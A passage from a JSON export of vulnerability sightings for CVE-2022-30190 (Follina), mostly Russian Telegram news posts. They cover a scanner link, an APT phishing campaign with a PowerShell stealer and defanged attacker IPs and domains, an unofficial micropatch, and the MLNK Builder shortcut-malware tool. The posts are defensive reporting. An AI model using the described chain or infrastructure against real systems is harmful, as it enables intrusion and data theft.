"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/512", "content": "CVE-2022-30190 : Follina Scanner \nhttps://github.com/ErrorNoInternet/FollinaScanner", "creation_timestamp": "2022-10-03T10:30:15.000000Z"}, {"uuid": "28307472-e814-44cf-98db-8616d356d46f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3032", "content": "\u034fFollinaGate \u043d\u0430\u0431\u0438\u0440\u0430\u0435\u0442 \u043e\u0431\u043e\u0440\u043e\u0442\u044b. \u041a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438, \u043e\u0448\u0438\u0431\u043a\u043e\u0439 Microsoft \u0443\u0436\u0435 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0410\u0420\u0422 \u0434\u043b\u044f \u043d\u0430\u043f\u0430\u0434\u0435\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u0415\u0432\u0440\u043e\u043f\u0435 \u0438 \u0421\u0428\u0410.\n\n\u041a\u0430\u043a \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e 0-day Follina, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u0441\u0445\u0435\u043c\u0443 URI \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 ms-msdt \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0446\u0435\u043b\u0435\u0432\u044b\u043c\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438. \u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0441 \u0441\u0430\u043c\u043e\u0433\u043e \u043d\u0430\u0447\u0430\u043b\u0430 \u043f\u044b\u0442\u0430\u043b\u0441\u044f \u0437\u0430\u043c\u044f\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u043e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0440\u0435\u0437\u043e\u043d\u0430\u043d\u0441\u0430 Microsoft \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c \u043f\u043e\u0434\u0441\u0443\u0435\u0442\u0438\u0442\u044c\u0441\u044f, \u043f\u0440\u0430\u0432\u0434\u0430 \u043f\u043e\u043a\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0431\u0443\u043c\u0430\u0433\u0435, \u043a\u0430\u043a \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c\u0441\u044f. \n\n\u042d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u043e \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c \u0447\u0430\u0441\u0442\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c: 0patch \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430\u00a0\u043d\u0435\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u00a0\u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Windows, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u0431\u0430\u0433\u0438 Microsoft Windows Support Diagnostic Tool (MSDT).\n\n\u041e \u043d\u043e\u0432\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 RCE CVE-2022-30190\u00a0(c \u043e\u0446\u0435\u043d\u043a\u043e\u0439 \u043f\u043e CVSS: 7,8) \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b Proofpoint, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0432 \u0445\u043e\u0434\u0435 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430 \u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 1000 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e RTF-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 \u0441 \u0442\u0435\u043c\u0430\u0442\u0438\u043a\u043e\u0439 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u044b. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u044d\u043a\u043f\u043b\u043e\u0439\u0442 \u043f\u043e\u0434\u0433\u0440\u0443\u0436\u0430\u043b\u0441\u044f \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0441 45.76.53[.]253.\n\n\n\u041f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0432 \u0444\u043e\u0440\u043c\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0441 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u043e\u0439 Base64 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u043a\u0430 \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 seller-notification[.]live.\n\n\u0421\u043a\u0440\u0438\u043f\u0442 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438, \u043a\u0440\u0430\u0434\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432, \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0441\u043b\u0443\u0436\u0431, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u043c\u0430\u0448\u0438\u043d\u044b, \u0430 \u0437\u0430\u0442\u0435\u043c \u0430\u0440\u0445\u0438\u0432\u0438\u0440\u0443\u0435\u0442 \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 45.77.156[.]179.\n\n\u041f\u043e\u0441\u043b\u0435 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0448\u0438\u0440\u043e\u043a\u0438\u0445 \u0440\u0430\u0437\u0432\u0435\u0434\u044b\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 PowerShell \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u043a\u0438 \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u043d\u0433\u0430, Proofpoint \u043f\u0440\u0438\u0448\u043b\u0438 \u043a \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u043e\u043c\u0443 \u0432\u044b\u0432\u043e\u0434\u0443 \u043e \u043f\u0440\u0438\u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438 \u043a \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u0440\u043e\u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0410\u0420\u0422.\n\n\u041d\u0435 \u043d\u0430\u0437\u044b\u0432\u0430\u044f \u0438\u043c\u0435\u043d, \u043d\u043e \u0436\u0438\u0440\u043d\u043e \u043d\u0430\u043c\u0435\u043a\u0430\u044f \u043d\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u044b\u0445 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u0435\u0439, \u0441\u0442\u0430\u0442\u044c\u0438 \u043e \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043f\u0435\u0448\u043d\u043e \u043f\u0435\u0447\u0430\u0442\u0430\u044e\u0442 \u0437\u0430\u043f\u0430\u0434\u043d\u044b\u0435 \u0438\u0437\u0434\u0430\u043d\u0438\u044f. \u0425\u043e\u0442\u044f \u043d\u0430\u043c \u043d\u0435 \u0434\u043e \u043a\u043e\u043d\u0446\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u043f\u0440\u0438 \u0442\u0430\u043a\u043e\u0439 \u0430\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u0438.", "creation_timestamp": "2022-06-06T20:57:39.000000Z"}, {"uuid": "315722e1-ab02-4876-b2cf-888125a4c800", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3009", "content": "\u041f\u043e \u0441\u0442\u0430\u0440\u043e\u0439 \u0434\u043e\u0431\u0440\u043e\u0439 \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e \u0432 \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u0445 Microsoft \u0437\u0430\u043d\u0438\u043c\u0430\u044e\u0442\u0441\u044f \u0432\u0441\u0435, \u043a\u0440\u043e\u043c\u0435 \u0441\u0430\u043c\u043e\u0439 Microsoft.\n\n0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 \u0432 Microsoft Windows Support Diagnostic Tool (MSDT), \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a Follina, \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0435 \u043d\u0435\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0435 0patch. \n\u00a0\n\u041f\u0430\u0442\u0447 \u0430\u0434\u0430\u043f\u0442\u0438\u0440\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 Windows: Windows 11 v21H2, Windows 10 (\u043e\u0442 v1803 \u0434\u043e v21H2), Windows 7 \u0438 Windows Server 2008 R2\n\n\u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0437\u0430\u0432\u0435\u043b\u0430\u0441\u044c PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0438 \u0443\u0436\u0435 \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0432 \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0435 \u043f\u043e\u0447\u0442\u0438 \u0432\u0441\u0435\u0433\u043e \u043a\u0438\u0431\u0435\u0440\u043f\u043e\u0434\u043f\u043e\u043b\u044c\u044f.\n\n\u0421\u0430\u043c \u0420\u0435\u0434\u043c\u043e\u043d\u0434 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0434\u043e \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043d\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043d\u0438\u0447\u0435\u0433\u043e, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0448\u0438\u0441\u044c \u043c\u0435\u0440\u0430\u043c\u0438 \u043f\u043e \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0439 \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0430\u0442\u0430\u043a, \u043f\u043e\u0441\u043e\u0432\u0435\u0442\u043e\u0432\u0430\u0432 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u00a0\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b URL-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 MSDT.\n\n\u041e\u0434\u043d\u0430\u043a\u043e 0patch \u043f\u043e\u0448\u043b\u0438 \u043f\u043e \u0434\u0440\u0443\u0433\u043e\u043c\u0443 \u043f\u0443\u0442\u0438, \u0432\u043c\u0435\u0441\u0442\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 URL-\u0430\u0434\u0440\u0435\u0441\u0430 MSDT, \u043e\u043d\u0438 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0438\u00a0\u043e\u0447\u0438\u0441\u0442\u043a\u0443 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u043f\u0443\u0442\u0438 (\u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438 Windows) \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0432\u044b\u0432\u043e\u0434\u0430 \u043c\u0430\u0441\u0442\u0435\u0440\u0430 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u043a\u0438 Windows \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0432 \u041e\u0421 \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439.\n\n0patch \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u043d\u0435 \u0438\u043c\u0435\u0435\u0442 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f, \u043a\u0430\u043a\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f Office \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430 \u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430 \u043b\u0438 \u043e\u043d\u0430 \u0432\u043e\u043e\u0431\u0449\u0435: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e\u00a0\u0434\u0440\u0443\u0433\u0438\u0445 \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u0432 \u0430\u0442\u0430\u043a.\n\n\u0427\u0442\u043e\u0431\u044b \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043c\u0438\u043a\u0440\u043e\u043f\u0430\u0442\u0447 \u0432 Windows \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c 0patch-\u0430\u0433\u0435\u043d\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442 \u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435.\n\n\u041e\u0436\u0438\u0434\u0430\u044e\u0449\u0438\u043c \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0430 \u043e\u0442 Microsoft \u0432 \u043f\u0435\u0440\u0432\u043e\u0439 \u0438\u0442\u0435\u0440\u0430\u0446\u0438\u0438 (\u043a\u043e\u0433\u0434\u0430 \u043e\u043d \u0432\u044b\u0439\u0434\u0435\u0442), \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u0430\u0442\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0438 \u0434\u043e\u0436\u0434\u0430\u0442\u044c\u0441\u044f \u043d\u043e\u0432\u044b\u0445 \u0434\u0432\u0443\u0445: \u043e\u0434\u0438\u043d \u0438\u0437 \u043d\u0438\u0445 \u0437\u0430\u043a\u0440\u043e\u0435\u0442 \u043e\u0441\u043d\u043e\u0432\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u0430 \u0432\u0442\u043e\u0440\u043e\u0439 - \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u0435\u0442 \u043f\u043e\u0441\u043b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439.", "creation_timestamp": "2022-06-02T11:31:14.000000Z"}, {"uuid": "43f097e5-0b75-4ec7-b3a5-2c009ed6c2b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3195", "content": "\u034f\u041e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0430\u044f \u0443\u0441\u043b\u0443\u0433\u0438 \u0418\u0411 \u0434\u043b\u044f \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438\u0437 Fortune 500, \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Resecurity Inc.\u00a0\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430\u00a0\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 MLNK Builder - \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u044f\u0440\u043b\u044b\u043a\u043e\u0432 (LNK) \u0441 \u0443\u043b\u0443\u0447\u0448\u0435\u043d\u043d\u044b\u043c Powershell \u0438 VBS Obfuscator.\n\nMLNK Builder \u0442\u0435\u043f\u0435\u0440\u044c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0432\u00a0Dark Web\u00a0\u0432 \u043d\u043e\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 4.2 \u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u043d\u0430\u0431\u043e\u0440\u043e\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u0439, \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043d\u0430 \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u0435 \u043e\u0442 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0438 \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u043a\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044f\u0440\u043b\u044b\u043a\u043e\u0432 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044f\u0440\u043b\u044b\u043a\u0438 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0432\u0441\u0435 \u0447\u0430\u0449\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f ransomware \u0438\u043b\u0438 \u0431\u044b\u0441\u0442\u0440\u043e\u0440\u0430\u0441\u0442\u0443\u0449\u0438\u0445 \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432.\n\n\u0412\u0441\u043f\u043b\u0435\u0441\u043a \u043a\u0440\u0443\u043f\u043d\u044b\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c LNK, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c\u044b\u0445 \u043a\u0430\u043a APT \u0438 \u0441\u043a\u0438\u043b\u043b\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c\u0438, \u0431\u044b\u043b \u0437\u0430\u043c\u0435\u0447\u0435\u043d \u0432 \u043f\u0435\u0440\u0438\u043e\u0434 \u0441 \u0430\u043f\u0440\u0435\u043b\u044f \u043f\u043e \u043c\u0430\u0439 \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430 - \u043a\u0430\u043a \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 Bumblebee\u00a0Loader \u0438\u00a0UAC-0010 (Armageddon).\n\n\u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 Bumblebee \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u043d\u0442\u0430\u043a\u0442\u043d\u044b\u0435 \u0444\u043e\u0440\u043c\u044b \u043d\u0430 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u0435 \u0446\u0435\u043b\u0438.\u00a0\u0412 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u0445 \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0432\u0435\u0431-\u0441\u0430\u0439\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0435 \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b \u0441\u0441\u044b\u043b\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 \u0444\u0430\u0439\u043b ISO, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e.\n\nResecurity \u043f\u0440\u0438\u043f\u0438\u0441\u0430\u043b\u0430 \u044d\u0442\u0443 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e \u043a TA578, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u043c\u0430\u044f 2020 \u0433\u043e\u0434\u0430. \u0410\u043a\u0442\u043e\u0440 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u0435 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 Ursnif, IcedID, KPOT Stealer, Buer Loader \u0438 BazaLoader, \u0430 \u0442\u0430\u043a\u0436\u0435 Cobalt Strike.\n\n\u041f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043e\u0432 Resecurity, 